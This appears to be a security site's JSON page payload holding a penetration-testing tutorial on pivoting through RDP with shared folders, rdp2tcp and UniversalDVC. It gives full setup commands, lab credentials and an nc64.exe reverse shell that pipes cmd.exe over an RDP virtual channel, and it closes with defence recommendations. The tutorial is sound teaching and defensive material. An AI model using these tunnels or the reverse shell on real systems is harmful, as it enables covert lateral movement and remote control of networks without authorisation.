[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fJ9_3xFhf-vmccYF5Is3XUcSVK_1dF_KM6uccxHrk6kk":3},{"id":4,"question":5,"answer":6,"answerHtml":7,"slug":8,"keywords":9,"article":10,"status":34,"aiModel":39,"aiConfidence":39,"updatedAt":52,"createdAt":52,"_status":51},195,"How does the shared file method work for establishing an RDP tunnel?","When establishing an RDP connection with file sharing enabled (using mstsc.exe, FreeRDP, or xfreerdp), a shared folder is created between client and server. The client and server can then read and write files in this shared folder to exchange data, effectively using it as a covert channel. This technique is demonstrated in the External C2 POC from Outflank, which follows Cobalt Strike's External C2 specification.","\u003Cp>When establishing an RDP connection with file sharing enabled (using mstsc.exe, FreeRDP, or xfreerdp), a shared folder is created between client and server. The client and server can then read and write files in this shared folder to exchange data, effectively using it as a covert channel. This technique is demonstrated in the External C2 POC from Outflank, which follows Cobalt Strike&#39;s External C2 specification.\u003C\u002Fp>\u003Cp>\u003Ca href=\"\u002Fnews\u002Fpenetration-techniques-establishing-tunnels-using-remote-desktop-protocol\">Read the related One Day Sec article\u003C\u002Fa>\u003C\u002Fp>","how-does-the-shared-file-method-work-for-establishing-an-rdp-tunnel-1777484898213","shared folder, RDP file sharing, External C2, covert channel",{"id":11,"title":12,"slug":13,"description":14,"content":15,"contentHtml":30,"cover":31,"author":32,"views":19,"readingTime":33,"status":34,"publishedAt":35,"seo":36,"tags":41,"qaPairs":42,"meta":48,"updatedAt":49,"createdAt":50,"_status":51},51,"Penetration Techniques - Establishing Tunnels Using Remote Desktop Protocol","penetration-techniques-establishing-tunnels-using-remote-desktop-protocol","Learn how to establish tunnels using RDP via file sharing and rdp2tcp for network pivoting and bypassing firewall restrictions in penetration testing scenarios.",{"root":16},{"type":17,"format":18,"indent":19,"version":20,"children":21,"direction":29},"root","",0,1,[22],{"type":23,"format":18,"indent":19,"version":20,"children":24,"direction":29},"paragraph",[25],{"mode":26,"text":27,"type":28,"style":18,"detail":19,"format":19,"version":20},"normal","\u003Chtml>\u003Chead>\u003C\u002Fhead>\u003Cbody>\u003Ch2>0x00 Preface\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Recently, I learned the method of establishing tunnels using Remote Desktop Protocol from @cpl3h's blog.\u003C\u002Fp>\u003Cp>This article will organize this method, combining personal experience and adding individual insights.\u003C\u002Fp>\u003Cp>Learning address:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fijustwannared.team\u002F2019\u002F11\u002F07\u002Fc2-over-rdp-virtual-channels\u002F\u003C\u002Fp>\u003Ch2>0x01 Introduction\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article will cover the following:\u003C\u002Fp>\u003Cul>\u003Cli>Usage Scenarios\u003C\u002Fli>\u003Cli>Establishing Tunnels Using Shared Files\u003C\u002Fli>\u003Cli>Establishing Tunnels Using rdp2tcp\u003C\u002Fli>\u003Cli>Establishing Tunnels Using UniversalDVC\u003C\u002Fli>\u003Cli>Exploitation Analysis\u003C\u002Fli>\u003Cli>Defense Recommendations\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x02 Usage Scenarios\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Due to firewall settings, only one Windows server's remote desktop can be connected. How to use this Windows server as a pivot to access the internal network\u003C\u002Fp>\u003Cp>Briefly described as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770019805163_0_6f66e1ff01.jpeg\">\u003C\u002Fp>\u003Ch2>0x03 Establishing a Channel Using Shared Files\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Using the shared files between the RDP Client and RDP Server as a data transmission channel by reading and writing them\u003C\u002Fp>\u003Cp>POC:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgithub.com\u002Foutflanknl\u002Fexternal_c2\u003C\u002Fp>\u003Cp>This is a POC written according to the External C2 specification in Cobalt Strike\u003C\u002Fp>\u003Ch3>Implementation Principle:\u003C\u002Fh3>\u003Cp>When establishing a remote desktop connection, a shared folder can be created between the RDP Client and RDP Server, using the shared files as a data transmission channel by reading and writing them\u003C\u002Fp>\u003Ch3>1. Connect to the remote desktop on a Windows system and enable file sharing\u003C\u002Fh3>\u003Ch4>(1) Enable file sharing by configuring mstsc.exe\u003C\u002Fh4>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770019820446_1_bf714e6e3d.jpeg\">\u003C\u002Fp>\u003Ch4>(2) Enable file sharing using FreeRDP\u003C\u002Fh4>\u003Cp>Download link:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fcloudbase.it\u002Ffreerdp-for-windows-nightly-builds\u002F\u003C\u002Fp>\u003Cp>Command example:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>wfreerdp \u002Fv:192.168.112.129:3389 -u:1 -p:Test123! \u002Fcert-ignore \u002Fdrive:share1,c:\\\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>2. Connect to remote desktop and enable file sharing on Kali system\u003C\u002Fh3>\u003Ch4>(1) Enable file sharing using xfreerdp\u003C\u002Fh4>\u003Cp>The command to share the local folder \u002Ftmp is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>xfreerdp \u002Fv:192.168.112.129:3389 \u002Fu:1 \u002Fp:Test123! \u002Fcert-ignore \u002Fdrive:share1,\u002Ftmp\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch4>(2) Enable file sharing using rdesktop\u003C\u002Fh4>\u003Cp>The command to share the local folder \u002Ftmp is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>rdesktop 192.168.112.129 -u1 -pTest123! -r disk:share1=\u002Ftmp\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>On the RDP Server, shared file resources can be accessed via \\\\tsclient\\\u003C\u002Fp>\u003Cp>For specific details on data transmission through file reading and writing, refer to xpn's article:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fblog.xpnsec.com\u002Fexploring-cobalt-strikes-externalc2-framework\u002F\u003C\u002Fp>\u003Ch2>0x04 Establishing a channel using rdp2tcp\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>rdp2tcp utilizes RDP virtual channel functionality for port multiplexing\u003C\u002Fp>\u003Cp>Available features:\u003C\u002Fp>\u003Cul>\u003Cli>Forward TCP port forwarding\u003C\u002Fli>\u003Cli>Reverse TCP port forwarding\u003C\u002Fli>\u003Cli>Handling standard input\u002Foutput forwarding\u003C\u002Fli>\u003Cli>SOCKS5 proxy\u003C\u002Fli>\u003C\u002Ful>\u003Cp>POC:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgithub.com\u002FV-E-O\u002Frdp2tcp\u003C\u002Fp>\u003Cp>Test system: Kali2 x64\u003C\u002Fp>\u003Ch3>1. Download and compile rdp2tcp\u003C\u002Fh3>\u003Ch4>(1) Install mingw-w64\u003C\u002Fh4>\u003Cp>The command is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>apt-get install mingw-w64\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch4>(2) Download rdp2tcp\u003C\u002Fh4>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>git clone https:\u002F\u002Fgithub.com\u002FV-E-O\u002Frdp2tcp.git\u003Cbr>cd rdp2tcp\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch4>(3) Modify the configuration file\u003C\u002Fh4>\u003Cp>rdp2tcp does not support compiling 64-bit exe by default, so it is necessary to modify the configuration file to add configuration information for compiling 64-bit exe\u003C\u002Fp>\u003Cp>Modify the file Makefile, the new content is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>all: client server-mingw64\u003Cbr>\u003Cbr>client: client\u002Frdp2tcp\u003Cbr>client\u002Frdp2tcp:\u003Cbr>\tmake -C client\u003Cbr>\u003Cbr>#server-mingw32: server\u002Frdp2tcp.exe\u003Cbr>#server\u002Frdp2tcp.exe:\u003Cbr>#\tmake -C server -f Makefile.mingw32\u003Cbr>\u003Cbr>server-mingw64: server\u002Frdp2tcp64.exe\u003Cbr>server\u002Frdp2tcp64.exe:\u003Cbr>\tmake -C server -f Makefile.mingw64\u003Cbr>\u003Cbr>clean:\u003Cbr>\tmake -C client clean\u003Cbr>#\tmake -C server -f Makefile.mingw32 clean\u003Cbr>\tmake -C server -f Makefile.mingw64 clean\u003Cbr>\tmake -C tools clean\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Since we are using a 64-bit operating system and have installed 64-bit MinGW, it is configured here to generate 64-bit exe files.\u003C\u002Fp>\u003Cp>Create a new file \u002Fserver\u002FMakefile.mingw64 with the following content:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>BIN=rdp2tcp64.exe\u003Cbr>CC=i686-w64-mingw32-gcc\u003Cbr>CFLAGS=-Wall -g \\\u003Cbr>\t\t -D_WIN32_WINNT=0x0501 \\\u003Cbr>\t\t -I..\u002Fcommon\u003Cbr>\u003Cbr># -D_WIN32_WINNT=0x0501\u003Cbr># -D_WIN32_WINNT=0x0501 -DDEBUG\u003Cbr>\u003Cbr>LDFLAGS=-lwtsapi32 -lws2_32\u003Cbr>OBJS=\t..\u002Fcommon\u002Fiobuf.o \\\u003Cbr>\t..\u002Fcommon\u002Fprint.o \\\u003Cbr>\t..\u002Fcommon\u002Fmsgparser.o \\\u003Cbr>\t..\u002Fcommon\u002Fnethelper.o \\\u003Cbr>\t..\u002Fcommon\u002Fnetaddr.o \\\u003Cbr>\terrors.o aio.o events.o \\\u003Cbr>\ttunnel.o channel.o process.o commands.o main.o\u003Cbr>\u003Cbr>all: clean_common $(BIN)\u003Cbr>\u003Cbr>clean_common:\u003Cbr>\t$(MAKE) -C ..\u002Fcommon clean\u003Cbr>\u003Cbr>$(BIN): $(OBJS)\u003Cbr>\t$(CC) -o $@ $(OBJS) $(LDFLAGS) \u003Cbr>\u003Cbr>%.o: %.c\u003Cbr>\t$(CC) $(CFLAGS) -o $@ -c $&lt;\u003Cbr>\u003Cbr>clean:\u003Cbr>\trm -f $(OBJS) $(BIN)\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch4>(4) Compilation\u003C\u002Fh4>\u003Cp>The command is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>make\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Generates the following files:\u003C\u002Fp>\u003Cul>\u003Cli>\u002Fserver\u002Frdp2tcp64.exe\u003C\u002Fli>\u003Cli>\u002Fclient\u002Frdp2tcp\u003C\u002Fli>\u003C\u002Ful>\u003Ch3>2. Install xfreerdp\u003C\u002Fh3>\u003Cp>The xfreerdp installed by default in Kali system does not support TCP redirection functionality\u003C\u002Fp>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770019830436_2_4c0ceb20e5.jpeg\">\u003C\u002Fp>\u003Cp>If TCP redirection is supported, the program will display the following content\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770019841410_3_a19e936b13.jpeg\">\u003C\u002Fp>\u003Cp>Need to re-download and compile xfreerdp. The version I used here is freerdp-nightly\u003C\u002Fp>\u003Cp>Reference link:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fci.freerdp.com\u002Fjob\u002Ffreerdp-nightly-binaries\u002F\u003C\u002Fp>\u003Cp>The distribution I used here is bionic. The complete installation commands are as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>echo \"deb http:\u002F\u002Fpub.freerdp.com\u002Frepositories\u002Fdeb\u002Fbionic\u002F freerdp-nightly main \" &gt;&gt;\u002Fetc\u002Fapt\u002Fsources.list\u003Cbr>wget -O - http:\u002F\u002Fpub.freerdp.com\u002Frepositories\u002FADD6BF6D97CE5D8D.asc | sudo apt-key add -\u003Cbr>apt-get update\u003Cbr>apt-get install freerdp-nightly\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The corresponding installation path is \u002Fopt\u002Ffreerdp-nightly\u003C\u002Fp>\u003Cp>To start the new version of xfreerdp, the corresponding path is: \u002Fopt\u002Ffreerdp-nightly\u002Fbin\u002Fxfreerdp\u003C\u002Fp>\u003Cp>The new version of xfreerdp supports TCP redirection, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770019861671_4_2c1b4f2ab9.jpeg\">\u003C\u002Fp>\u003Ch3>3. Connect to remote desktop using xfreerdp and establish a tunnel\u003C\u002Fh3>\u003Cp>This section introduces the method for forward TCP port forwarding\u003C\u002Fp>\u003Ch4>(1) Execute xfreerdp and enable TCP redirection\u003C\u002Fh4>\u003Cp>Execute on Kali system:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>\u002Fopt\u002Ffreerdp-nightly\u002Fbin\u002Fxfreerdp \u002Fv:192.168.112.129:3389 \u002Fu:1 \u002Fp:Test123! \u002Fcert-ignore \u002Frdp2tcp:\u002Froot\u002Frdp2tcp\u002Fclient\u002Frdp2tcp\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch4>(2) Upload rdp2tcp64.exe to RDP Server and execute (no administrator privileges required)\u003C\u002Fh4>\u003Cp>Execution result as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770019867012_5_b6db672171.jpeg\">\u003C\u002Fp>\u003Ch4>(3) Start rdp2tcp.py on Kali system\u003C\u002Fh4>\u003Cp>Commands as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>cd rdp2tcp\u002Ftools\u003Cbr>python rdp2tcp.py\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Command to add forward port forwarding (local 445-&gt;192.168.112.129:445) is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>python rdp2tcp.py add forward 127.0.0.1 445 192.168.112.129 445\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Output result as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770019870435_6_10373df03d.jpeg\">\u003C\u002Fp>\u003Ch4>(4) Access local port 445\u003C\u002Fh4>\u003Cp>Data accessing local port 445 is forwarded to port 445 of 192.168.112.129, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770019874768_7_d69b9c8545.jpeg\">\u003C\u002Fp>\u003Cp>Forward port forwarding established successfully\u003C\u002Fp>\u003Ch2>0x05 Using UniversalDVC to establish a channel\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>UniversalDVC establishes a channel by registering the UDVC plugin in the form of using dynamic virtual channels\u003C\u002Fp>\u003Cp>POC:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgithub.com\u002Fearthquake\u002FUniversalDVC\u003C\u002Fp>\u003Cp>Test system: Win7 x64\u003C\u002Fp>\u003Ch3>1. Install UDVC plugin\u003C\u002Fh3>\u003Cp>Download the compiled 64-bit file from the following address:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgithub.com\u002Fearthquake\u002FUniversalDVC\u002Ffiles\u002F1880297\u002FUDVC-x64.zip\u003C\u002Fp>\u003Cp>Save the 64-bit dll in %windir%\\system32\u003C\u002Fp>\u003Cp>The command to register the DLL is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>regsvr32.exe UDVC-Plugin.x64.dll\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770019878321_8_69d05f4c05.jpeg\">\u003C\u002Fp>\u003Cp>After registering the UDVC plugin, registry entries will be created to save configuration information\u003C\u002Fp>\u003Cp>Configuration file location: HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Default\\AddIns\\UDVC-Plugin\u003C\u002Fp>\u003Cp>The default listening port is 31337\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>The UDVC plugin will only start listening on the port after the RDP Server launches UDVC-Server.exe\u003C\u002Fp>\u003Ch3>2. Implementing port forwarding functionality\u003C\u002Fh3>\u003Ch4>(1) Set Mode to Socket server mode (0 - default)\u003C\u002Fh4>\u003Cp>The cmd command to modify the registry is:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>reg add \"hkcu\\Software\\Microsoft\\Terminal Server Client\\Default\\AddIns\\UDVC-Plugin\" \u002Fv mode \u002Ft REG_DWORD \u002Fd 0 \u002Ff\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch4>(2) Set the listening port to 1234\u003C\u002Fh4>\u003Cp>The cmd command to modify the registry is:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>reg add \"hkcu\\Software\\Microsoft\\Terminal Server Client\\Default\\AddIns\\UDVC-Plugin\" \u002Fv port \u002Ft REG_SZ \u002Fd 1234 \u002Ff\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch4>(3) Start the Remote Desktop client\u003C\u002Fh4>\u003Cp>The command is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>mstsc.exe\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Connect to Remote Desktop\u003C\u002Fp>\u003Ch4>(4) RDP Server starts UDVC-Server.exe\u003C\u002Fh4>\u003Cp>The command is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>UDVC-Server.x64.exe -c -p 80 -i 192.168.112.129 -0\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch4>(5) RDP Client opens a browser and accesses http:\u002F\u002F127.0.0.1:1234\u003C\u002Fh4>\u003Cp>Obtain data from the internal network 192.168.112.129:80\u003C\u002Fp>\u003Cp>Tunnel establishment completed, a brief flowchart is shown below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770019881748_9_43a3b83c9e.jpeg\">\u003C\u002Fp>\u003Ch3>3. Implement reverse shell functionality\u003C\u002Fh3>\u003Cp>RDP Server sends a reverse shell to RDP Client\u003C\u002Fp>\u003Cp>RDP Client can control RDP Server in real-time, executing cmd commands\u003C\u002Fp>\u003Ch4>(1) Set Mode to Socket client mode (1)\u003C\u002Fh4>\u003Cp>The cmd command to modify the registry is:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>reg add \"hkcu\\Software\\Microsoft\\Terminal Server Client\\Default\\AddIns\\UDVC-Plugin\" \u002Fv mode \u002Ft REG_DWORD \u002Fd 1 \u002Ff\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch4>(2) Set the listening port to 1234\u003C\u002Fh4>\u003Cp>The cmd command to modify the registry is:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>reg add \"hkcu\\Software\\Microsoft\\Terminal Server Client\\Default\\AddIns\\UDVC-Plugin\" \u002Fv port \u002Ft REG_SZ \u002Fd 1234 \u002Ff\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch4>(3) Start the Remote Desktop client\u003C\u002Fh4>\u003Cp>The command is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>mstsc.exe\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Connect to Remote Desktop\u003C\u002Fp>\u003Ch4>(4) RDP Client uses nc to listen on local port 1234\u003C\u002Fh4>\u003Cp>The command is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>nc64.exe -lvp 1234\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch4>(5) RDP Server starts UDVC-Server.exe\u003C\u002Fh4>\u003Cp>The command is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>UDVC-Server.x64.exe -p 5678 -0\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>A dynamic virtual channel will now be established: RDP Server-&gt;RDP Client:1234\u003C\u002Fp>\u003Cp>And the RDP Server starts listening on port 5678\u003C\u002Fp>\u003Ch4>(6) The RDP Server uses nc to connect to local port 5678 and specifies the redirected program as c:\\windows\\system32\\cmd.exe\u003C\u002Fh4>\u003Cp>The command is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>nc64.exe 127.0.0.1 5678 -e c:\\windows\\system32\\cmd.exe\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Channel establishment completed. A brief flowchart is shown below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770019885521_10_1481cef1ff.jpeg\">\u003C\u002Fp>\u003Ch2>0x06 Exploitation Analysis\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>For these three channel establishment methods (file sharing, rdp2tcp, and UniversalDVC), the prerequisite for exploitation is having already obtained permission to connect to the remote desktop.\u003C\u002Fp>\u003Cp>Strictly speaking, once you can utilize this remote desktop server, you already have the ability to access internal network resources.\u003C\u002Fp>\u003Cp>The significance of researching this method lies in situations where the remote desktop server cannot run our programs.\u003C\u002Fp>\u003Cp>For example, if the remote desktop server is a Windows system, but the program we want to execute only supports Linux, this avoids the issue of program porting.\u003C\u002Fp>\u003Ch2>0x07 Defense Recommendations\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>1. Security of Internet-facing Remote Desktop Servers\u003C\u002Fp>\u003Cp>If an attacker can establish a channel using the Remote Desktop Protocol, it means the attacker has already gained access to the server. Therefore, for remote desktop servers accessible from the internet, it is essential not only to apply patches promptly but also to guard against password brute-force attacks.\u003C\u002Fp>\u003Cp>2. Disabling Redirected Devices Using Group Policy\u003C\u002Fp>\u003Cp>Group Policy Location:\u003C\u002Fp>\u003Cp>Computer Configuration-&gt;Administrative Templates-&gt;Windows Components-&gt;Remote Desktop Services-&gt;Remote Desktop Session Host-&gt;Device and Resource Redirection\u003C\u002Fp>\u003Ch2>0x08 Summary\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article references @cpl3h's post, organizes methods for establishing channels using the Remote Desktop Protocol, incorporates personal experience, adds individual insights, analyzes exploitation approaches, and summarizes defense recommendations.\u003C\u002Fp>\u003C\u002Fbody>\u003C\u002Fhtml>","text","ltr","\u003Chtml>\u003Chead>\u003C\u002Fhead>\u003Cbody>\u003Ch2>0x00 Preface\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Recently, I learned the method of establishing tunnels using Remote Desktop Protocol from @cpl3h's blog.\u003C\u002Fp>\u003Cp>This article will organize this method, combining personal experience and adding individual insights.\u003C\u002Fp>\u003Cp>Learning address:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fijustwannared.team\u002F2019\u002F11\u002F07\u002Fc2-over-rdp-virtual-channels\u002F\u003C\u002Fp>\u003Ch2>0x01 Introduction\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article will cover the following:\u003C\u002Fp>\u003Cul>\u003Cli>Usage Scenarios\u003C\u002Fli>\u003Cli>Establishing Tunnels Using Shared Files\u003C\u002Fli>\u003Cli>Establishing Tunnels Using rdp2tcp\u003C\u002Fli>\u003Cli>Establishing Tunnels Using UniversalDVC\u003C\u002Fli>\u003Cli>Exploitation Analysis\u003C\u002Fli>\u003Cli>Defense Recommendations\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x02 Usage Scenarios\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Due to firewall settings, only one Windows server's remote desktop can be connected. How to use this Windows server as a pivot to access the internal network\u003C\u002Fp>\u003Cp>Briefly described as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770019805163_0_6f66e1ff01-1.jpeg\">\u003C\u002Fp>\u003Ch2>0x03 Establishing a Channel Using Shared Files\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Using the shared files between the RDP Client and RDP Server as a data transmission channel by reading and writing them\u003C\u002Fp>\u003Cp>POC:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgithub.com\u002Foutflanknl\u002Fexternal_c2\u003C\u002Fp>\u003Cp>This is a POC written according to the External C2 specification in Cobalt Strike\u003C\u002Fp>\u003Ch3>Implementation Principle:\u003C\u002Fh3>\u003Cp>When establishing a remote desktop connection, a shared folder can be created between the RDP Client and RDP Server, using the shared files as a data transmission channel by reading and writing them\u003C\u002Fp>\u003Ch3>1. Connect to the remote desktop on a Windows system and enable file sharing\u003C\u002Fh3>\u003Ch4>(1) Enable file sharing by configuring mstsc.exe\u003C\u002Fh4>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770019820446_1_bf714e6e3d-1.jpeg\">\u003C\u002Fp>\u003Ch4>(2) Enable file sharing using FreeRDP\u003C\u002Fh4>\u003Cp>Download link:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fcloudbase.it\u002Ffreerdp-for-windows-nightly-builds\u002F\u003C\u002Fp>\u003Cp>Command example:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>wfreerdp \u002Fv:192.168.112.129:3389 -u:1 -p:Test123! \u002Fcert-ignore \u002Fdrive:share1,c:\\\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>2. Connect to remote desktop and enable file sharing on Kali system\u003C\u002Fh3>\u003Ch4>(1) Enable file sharing using xfreerdp\u003C\u002Fh4>\u003Cp>The command to share the local folder \u002Ftmp is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>xfreerdp \u002Fv:192.168.112.129:3389 \u002Fu:1 \u002Fp:Test123! \u002Fcert-ignore \u002Fdrive:share1,\u002Ftmp\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch4>(2) Enable file sharing using rdesktop\u003C\u002Fh4>\u003Cp>The command to share the local folder \u002Ftmp is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>rdesktop 192.168.112.129 -u1 -pTest123! -r disk:share1=\u002Ftmp\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>On the RDP Server, shared file resources can be accessed via \\\\tsclient\\\u003C\u002Fp>\u003Cp>For specific details on data transmission through file reading and writing, refer to xpn's article:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fblog.xpnsec.com\u002Fexploring-cobalt-strikes-externalc2-framework\u002F\u003C\u002Fp>\u003Ch2>0x04 Establishing a channel using 